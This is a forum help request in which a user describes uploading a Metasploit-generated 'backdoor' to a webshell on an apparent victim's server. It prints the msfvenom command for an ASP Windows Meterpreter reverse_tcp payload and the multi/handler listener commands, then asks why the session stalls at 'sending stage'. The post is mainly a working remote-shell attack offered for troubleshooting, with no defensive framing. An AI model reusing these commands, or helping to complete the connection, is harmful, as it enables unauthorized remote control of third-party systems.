Jump to content

[metasploit]stuck in sending stage


johan123

Recommended Posts

I made a backdoor and upload to webshell,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=MY_IP LPORT=4444 -f asp > /root/Desktop/shell.asp

From my computer,

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
exploit -j -z

When i run this,

19260329_10213408259427905_2571360681503

it stuck in "sending stage"!

it is strange because my ip can detect victim ip but no any session with this exploit, can someone help me?

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...